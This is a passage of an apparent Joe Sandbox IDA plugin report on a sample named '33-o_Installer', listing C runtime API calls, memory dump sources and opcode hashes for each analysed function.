                • Instruction Fuzzy Hash: C5E01A3511810A8FCF20AB78C04AFA87394EB48315F5E54A9E40DCB2B2C738E8518AB2
                APIs
                • __CreateFrameInfo.LIBCMT ref: 00DC79BB
                  • Part of subcall function 00DC4842: __getptd.LIBCMT ref: 00DC4850
                  • Part of subcall function 00DC4842: __getptd.LIBCMT ref: 00DC485E
                • __getptd.LIBCMT ref: 00DC79C5
                  • Part of subcall function 00DC979C: __getptd_noexit.LIBCMT ref: 00DC979F
                  • Part of subcall function 00DC979C: __amsg_exit.LIBCMT ref: 00DC97AC
                • __getptd.LIBCMT ref: 00DC79D3
                • __getptd.LIBCMT ref: 00DC79E1
                • __getptd.LIBCMT ref: 00DC79EC
                • _CallCatchBlock2.LIBCMT ref: 00DC7A12
                  • Part of subcall function 00DC48E7: __CallSettingFrame@12.LIBCMT ref: 00DC4933
                  • Part of subcall function 00DC7AB9: __getptd.LIBCMT ref: 00DC7AC8
                  • Part of subcall function 00DC7AB9: __getptd.LIBCMT ref: 00DC7AD6
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                • String ID:
                • API String ID: 1602911419-0
                • Opcode ID: e6262efbf070ded7b777bfe04af5a68fe5dcba89eb03d81db9f279e90690c771
                • Instruction ID: d7b05a6ba7279795822dfeef6a0772ae543baa987ccdefc939532b62d3830bbd
                • Opcode Fuzzy Hash: e6262efbf070ded7b777bfe04af5a68fe5dcba89eb03d81db9f279e90690c771
                • Instruction Fuzzy Hash: 6C11B3B5C0520A9FDF00EFA4D446BADBBB0FF08314F15846AE858A7291DB389A159F64
                APIs
                • __getptd.LIBCMT ref: 00DCD230
                  • Part of subcall function 00DC979C: __getptd_noexit.LIBCMT ref: 00DC979F
                  • Part of subcall function 00DC979C: __amsg_exit.LIBCMT ref: 00DC97AC
                • __amsg_exit.LIBCMT ref: 00DCD250
                • __lock.LIBCMT ref: 00DCD260
                • InterlockedDecrement.KERNEL32(?), ref: 00DCD27D
                • _free.LIBCMT ref: 00DCD290
                • InterlockedIncrement.KERNEL32(00F61670), ref: 00DCD2A8
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                • String ID:
                • API String ID: 3470314060-0
                • Opcode ID: c634510cb64d07aad8e99cca58c0449d09da63e3e475410df3f9f64a450c0364
                • Instruction ID: aff2af312aed94b9252006474dfb216c7a71256be40649a7e519a16f407bb62f
                • Opcode Fuzzy Hash: c634510cb64d07aad8e99cca58c0449d09da63e3e475410df3f9f64a450c0364
                • Instruction Fuzzy Hash: 86015E32901723ABCB20AF649C06F59B3A1AB40761F19402EE815A7391CB74E942CBB9
                APIs
                • __EH_prolog.LIBCMT ref: 00DC1B0B
                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00DC1B1F
                  • Part of subcall function 00DC32F5: _setlocale.LIBCMT ref: 00DC3307
                • _free.LIBCMT ref: 00DC1B2D
                  • Part of subcall function 00DC4452: HeapFree.KERNEL32(00000000,00000000,?,00DC3C7B,?,?,00DC101C), ref: 00DC4468
                  • Part of subcall function 00DC4452: GetLastError.KERNEL32(?,?,00DC3C7B,?,?,00DC101C), ref: 00DC447A
                • _free.LIBCMT ref: 00DC1B3F
                • _free.LIBCMT ref: 00DC1B51
                • _free.LIBCMT ref: 00DC1B63
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: _free$ErrorFreeH_prologHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                • String ID:
                • API String ID: 770894815-0
                • Opcode ID: 6ff7b9a73a924fdf3c0061c6bb616656d54ce5021f5ee586f560a33c0fe690a7
                • Instruction ID: 774b30be1d52da9aa2b38a1325ba7e338d9353ee05ac79c51876b534bd40b830
                • Opcode Fuzzy Hash: 6ff7b9a73a924fdf3c0061c6bb616656d54ce5021f5ee586f560a33c0fe690a7
                • Instruction Fuzzy Hash: A9014835600B129ADB28AB68D816F9BB3E8FF02724F14C51EE065D7581DBB8DA048E74
                APIs
                • __CxxThrowException@8.LIBCMT ref: 00DC155A
                • std::exception::exception.LIBCMT ref: 00DC157C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: Exception@8Throwstd::exception::exception
                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                • API String ID: 3728558374-1866435925
                • Opcode ID: ed6dd9adde4d72bb086bf8462dad22d1ab2727a14a7e23b111b642967d49f5f8
                • Instruction ID: 9156ce8f764e3c732697d23d0ff038b53a2bdd06155bb88d553a0d6039290ea8
                • Opcode Fuzzy Hash: ed6dd9adde4d72bb086bf8462dad22d1ab2727a14a7e23b111b642967d49f5f8
                • Instruction Fuzzy Hash: B2015EB582021AAFCB00EFA88416FADBBF49B81314F64C11EA5569B342D675CA15CF71
                APIs
                • ___BuildCatchObject.LIBCMT ref: 00DC7D53
                  • Part of subcall function 00DC7CAE: ___BuildCatchObjectHelper.LIBCMT ref: 00DC7CE4
                • _UnwindNestedFrames.LIBCMT ref: 00DC7D6A
                • ___FrameUnwindToState.LIBCMT ref: 00DC7D78
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                • String ID: csm$csm
                • API String ID: 2163707966-3733052814
                • Opcode ID: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
                • Instruction ID: 9e7e6da2b07bea780b7b1d427752c43318c49c544b28b4221f43a037081984b1
                • Opcode Fuzzy Hash: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
                • Instruction Fuzzy Hash: B501E47140510ABBDF126F91CC45FAA7F6AFF08360F144418BD5916161D73299A2DFB1
                APIs
                • _malloc.LIBCMT ref: 00DCDE76
                  • Part of subcall function 00DC729E: __FF_MSGBANNER.LIBCMT ref: 00DC72B7
                  • Part of subcall function 00DC729E: __NMSG_WRITE.LIBCMT ref: 00DC72BE
                  • Part of subcall function 00DC729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00DC63C9,00000000,00000001,00000000,?,00DCB742,00000018,00DDD728,0000000C,00DCB7D2), ref: 00DC72E3
                • _free.LIBCMT ref: 00DCDE89
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: AllocateHeap_free_malloc
                • String ID:
                • API String ID: 1020059152-0
                • Opcode ID: 94c14c1ecd6810ee7e6c4cc9fc838cc5f4fd2567ac68d0b3c7ee471523746f6a
                • Instruction ID: aa2075578a70ebd6907507175705722e1d38928646eac4a82bf933342110a1ee
                • Opcode Fuzzy Hash: 94c14c1ecd6810ee7e6c4cc9fc838cc5f4fd2567ac68d0b3c7ee471523746f6a
                • Instruction Fuzzy Hash: A91186324056179BCB217F74AD06F5A379ADB54370B25453EF8D99F151DE30C8418AB1
                APIs
                • __getptd.LIBCMT ref: 00DCD9B1
                  • Part of subcall function 00DC979C: __getptd_noexit.LIBCMT ref: 00DC979F
                  • Part of subcall function 00DC979C: __amsg_exit.LIBCMT ref: 00DC97AC
                • __getptd.LIBCMT ref: 00DCD9C8
                • __amsg_exit.LIBCMT ref: 00DCD9D6
                • __lock.LIBCMT ref: 00DCD9E6
                • __updatetlocinfoEx_nolock.LIBCMT ref: 00DCD9FA
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                • String ID:
                • API String ID: 938513278-0
                • Opcode ID: 2957e8cae91b38b060855a1495a1baf2ee78d3f64f8a29beaab72eb39eece3d8
                • Instruction ID: 2d5cab71c728bdf21139ff967290be25dd14d7328b0f9a1978f46a5af0a0d95c
                • Opcode Fuzzy Hash: 2957e8cae91b38b060855a1495a1baf2ee78d3f64f8a29beaab72eb39eece3d8
                • Instruction Fuzzy Hash: DCF0CD329403028EDB20BB789C07F0D77A1EF00324F19012EF404AB2C2CF3489408E7A
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: be357738b88aa32033e959664d9c4edef258d5b3ed29f6baf06f5e8104f1148c
                • Instruction ID: e7cf0a93d214a3c06a807417978d6b7fd601eb99317c64ef813a751daca3ecbf
                • Opcode Fuzzy Hash: be357738b88aa32033e959664d9c4edef258d5b3ed29f6baf06f5e8104f1148c
                • Instruction Fuzzy Hash: 34514A7590061AAFCB14DBA8C9D1EBEB7F9EF09314B24056EE542A7681D770AE44CB30
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                • String ID:
                • API String ID: 2782032738-0
                • Opcode ID: 214febab279902aaaf85238c35f9e5b7d000cfacc0f7fa1f8ded75630d6de8c4
                • Instruction ID: 356663d4461bcb3da8f97ad4d53e6eb0d4f3e21815bf903fb4b7abff2888356d
                • Opcode Fuzzy Hash: 214febab279902aaaf85238c35f9e5b7d000cfacc0f7fa1f8ded75630d6de8c4
                • Instruction Fuzzy Hash: 9B41D331A10A069BDB248F69A845F9EB7B2EF80360F28852DE45697184D770FD818B70
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DD3C19
                • __isleadbyte_l.LIBCMT ref: 00DD3C4C
                • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 00DD3C7D
                • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 00DD3CEB
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: 007f233f12e4d401b35f9c19d35bef1efdfb9c698dc10272da9be4adecb03f7e
                • Instruction ID: d1a4b0b5a70fc5f23ae5ddf901709246ecfd41ab0ad5367dba9c4a37aacfe0d7
                • Opcode Fuzzy Hash: 007f233f12e4d401b35f9c19d35bef1efdfb9c698dc10272da9be4adecb03f7e
                • Instruction Fuzzy Hash: 2E318431A11286EFDB10DF6CC885AB97BB5FF01310F19856AE461AB291D730DE50DB72
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                • Instruction ID: 7abab7f37374930e6b8407cddf865f45a75f3ddd1c41e9d093c28a370de47b44
                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                • Instruction Fuzzy Hash: 63116D7605024BBBCF125E84CC1ADEE7F22BF18390B198559FA185A020C736C9B1ABA1
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: _wprintf
                • String ID:
                • API String ID: 2738768116-0
                • Opcode ID: b951b53b610f204f602ccb8d6b4c4e3fbf5bce1fe961bc3177876232da16b173
                • Instruction ID: 61411fed2fc8e0e5925d7d1dc7f9d4b447242d68ca0abeaa6a5d94df51ac3734
                • Opcode Fuzzy Hash: b951b53b610f204f602ccb8d6b4c4e3fbf5bce1fe961bc3177876232da16b173
                • Instruction Fuzzy Hash: 00F0A7279C91332D953C30A6242AF87CF40EB03BF0725102FB8CCA31C21982084680F8
                APIs
                • std::_Xinvalid_argument.LIBCPMT ref: 00DC35E5
                  • Part of subcall function 00DC38C7: std::exception::exception.LIBCMT ref: 00DC38DC
                  • Part of subcall function 00DC38C7: __CxxThrowException@8.LIBCMT ref: 00DC38F1
                  • Part of subcall function 00DC2279: std::_Xinvalid_argument.LIBCPMT ref: 00DC228A
                • _memmove.LIBCMT ref: 00DC3640
                Strings
                • invalid string position, xrefs: 00DC35E0
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: Xinvalid_argumentstd::_$Exception@8Throw_memmovestd::exception::exception
                • String ID: invalid string position
                • API String ID: 1253240057-1799206989
                • Opcode ID: c3a0daec1f03e2089644a925084b3fdfdd920bedc70c0482ee2761fe216445d7
                • Instruction ID: e170c21fb1591059061cfef6d2302301ed79a934f2019bd994789cfa72a5143b
                • Opcode Fuzzy Hash: c3a0daec1f03e2089644a925084b3fdfdd920bedc70c0482ee2761fe216445d7
                • Instruction Fuzzy Hash: 3B11C131344312ABCB299E1C9851F6AB3A5EB95720F14892EF9568B381CB71DB01C7B5
                APIs
                • std::_Xinvalid_argument.LIBCPMT ref: 00DC2171
                  • Part of subcall function 00DC38C7: std::exception::exception.LIBCMT ref: 00DC38DC
                  • Part of subcall function 00DC38C7: __CxxThrowException@8.LIBCMT ref: 00DC38F1
                • _memmove.LIBCMT ref: 00DC21AA
                Strings
                • invalid string position, xrefs: 00DC216C
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
                • String ID: invalid string position
                • API String ID: 22950630-1799206989
                • Opcode ID: e955b81102d2ca65dbda9df060c8efa10bda729f95040e2f1683bd1ffde7f171
                • Instruction ID: 4bf8998928ba3cf0c083fc87d3bb7d6828080e42484dcfd9b19bb143080d4331
                • Opcode Fuzzy Hash: e955b81102d2ca65dbda9df060c8efa10bda729f95040e2f1683bd1ffde7f171
                • Instruction Fuzzy Hash: C301B5313007525BD7249E6CDCC0E3AB7E6EB807107284D3DE68187645DB70EC4687B0
                APIs
                  • Part of subcall function 00DC4895: __getptd.LIBCMT ref: 00DC489B
                  • Part of subcall function 00DC4895: __getptd.LIBCMT ref: 00DC48AB
                • __getptd.LIBCMT ref: 00DC7AC8
                  • Part of subcall function 00DC979C: __getptd_noexit.LIBCMT ref: 00DC979F
                  • Part of subcall function 00DC979C: __amsg_exit.LIBCMT ref: 00DC97AC
                • __getptd.LIBCMT ref: 00DC7AD6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: csm
                • API String ID: 803148776-1018135373
                • Opcode ID: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
                • Instruction ID: c49a1ee8e90e420af1fa5e6a29bbafc84d70c2ff29dfdcc81a2e83cf6e88194e
                • Opcode Fuzzy Hash: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
                • Instruction Fuzzy Hash: 2F012C398062068ACF359F62C458FADB7BAEF14311F68482EE051575A1CB308D81CE31